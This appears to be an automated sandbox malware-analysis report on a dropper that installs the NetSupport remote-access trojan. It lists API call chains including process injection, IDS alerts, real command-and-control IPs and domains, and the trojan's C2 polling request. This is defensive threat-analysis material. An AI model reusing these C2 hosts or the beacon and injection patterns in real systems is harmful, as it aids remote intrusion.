Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: is-KE7IL.tmp.2.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb"" source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000002.1786562154.0000000000FDC000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000002.1786562154.0000000000FDC000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Xml.pdb source: is-LNG1F.tmp.2.dr
Source:	Binary string: client32.pdb source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdbt3 source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3149534462.000000006FFF5000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000008.00000002.1674950229.000000006FFF5000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.1758516966.000000006FFF5000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: is-UNKVD.tmp.2.dr

Spreading

Yara detected Advanced IP Scanner Hacktool

Source: Yara match

File source: C:\Program Files (x86)\Advanced IP Scanner\is-3UOHG.tmp, type: DROPPED

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	6_2_11123570
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	6_2_11069690
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,	6_2_1110BB80
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	6_2_11107FE0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	6_2_110BC3D0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	6_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	6_2_11064E30
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	8_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	8_2_11123570
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	8_2_11069690
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,	8_2_1110BB80
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	8_2_11107FE0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	8_2_110BC3D0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	8_2_11064E30

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.10:49837 -> 151.236.16.15:443
Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.10:49838 -> 199.188.200.195:443

Yara detected NetSupport Downloader

Source: Yara match	File source: amsi32_7320.amsi.csv, type: OTHER
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Advanced IP Scanner\unins000.dat, type: DROPPED

Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 151.236.16.15 151.236.16.15
Source: Joe Sandbox View	IP Address: 104.26.0.231 104.26.0.231
Source: Joe Sandbox View	IP Address: 199.188.200.195 199.188.200.195

Source: Joe Sandbox View	ASN Name: HVC-ASUS HVC-ASUS
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.10:49787
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.10:49949

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: payiki.com
Source: global traffic	DNS traffic detected: DNS query: anyhowdo.com
Source: global traffic	DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

HTTP traffic detected: POST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:15:25 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df78c5d5c396c1a-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QY0IX7lG17NYDRxwLZt7yTP7c9Nrl3BkpE7lI9qKQ9umEPy9ozFcFKPsnmre9di09hgge5jbXoTD47Hyo1%2BClAjLDCrG6U8kABxZb62e4Cmi6oodvNN3O58OPEDnpdWrlJ1FK8SvfjunX%2B%2BQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1012&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:15:26 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df78c634b3ae792-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2B%2Bgn9Sju7ghC7YwbcS9HLvVhU6izqF1xugQFpR1ru%2FVHkKPs8QXYspj4ci%2FnDz30yCX4Kz%2BSMvqQnQM6xi9YyfBSDbwGc%2FVG9hNTZbBAPsUyeSqCgwFD%2BwYG7anT3%2BAJvQ6pYbvF05pELsc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1628&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:15:27 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df78c69291e358e-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iMsyYgFtTpxapWTuYtUZKkbIpGoYg9k8f72mhXqA4mtZko9r99YuoimNfG7xUTJPvu57xXF5ep3tM9uOiosqUMRISTkUU6Fjx2fat%2Bk%2FF%2F7R%2FeJiHk8j9IPBz5IHZa1hRMHdF7%2BKL%2FC1JoJb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1338&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0

Source: client32.exe, client32.exe, 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://%s/fakeurl.htm
Source: powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://%s/testpage.htm
Source: powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: client32.exe, client32.exe, 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://127.0.0.1
Source: client32.exe, 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000004.00000002.1654538117.00000000030F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microH
Source: powershell.exe, 00000004.00000002.1711196700.00000000099B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftc
Source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000564F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: client32.exe, 00000006.00000002.3146712251.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/
Source: client32.exe, client32.exe, 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: client32.exe, 00000006.00000003.1875925880.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3146995488.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp(
Source: client32.exe, 00000006.00000002.3140062233.0000000000750000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.1876001809.0000000000731000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspD
Source: client32.exe, 00000006.00000003.1875803246.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3147138896.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspF
Source: client32.exe, 00000006.00000003.1875925880.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3146995488.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspL
Source: client32.exe, 00000006.00000003.1875925880.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3146995488.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspP
Source: client32.exe, 00000006.00000003.1875803246.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3147138896.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspPV
Source: client32.exe, 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: client32.exe, 00000006.00000003.1875925880.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3146995488.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspf
Source: client32.exe, 00000006.00000003.1875905271.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.1875803246.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asph
Source: client32.exe, 00000006.00000002.3140062233.0000000000750000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.1876001809.0000000000731000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asplbV
Source: client32.exe, 00000006.00000002.3146712251.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/qc
Source: powershell.exe, 00000004.00000002.1675819227.0000000006868000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000564F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000004.00000002.1657069390.0000000004F56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: is-LNG1F.tmp.2.dr	String found in binary or memory: http://qt-project.org/xml/features/report-start-end-entity
Source: is-LNG1F.tmp.2.dr	String found in binary or memory: http://qt-project.org/xml/features/report-whitespace-only-CharData
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000002.1786562154.0000000000FDC000.00000004.00000010.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, is-LNG1F.tmp.2.dr	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, is-LNG1F.tmp.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, is-LNG1F.tmp.2.dr	String found in binary or memory: http://s.symcd.com06
Source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000002.1786562154.0000000000FDC000.00000004.00000010.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, is-LNG1F.tmp.2.dr	String found in binary or memory: http://s.symcd.com0_
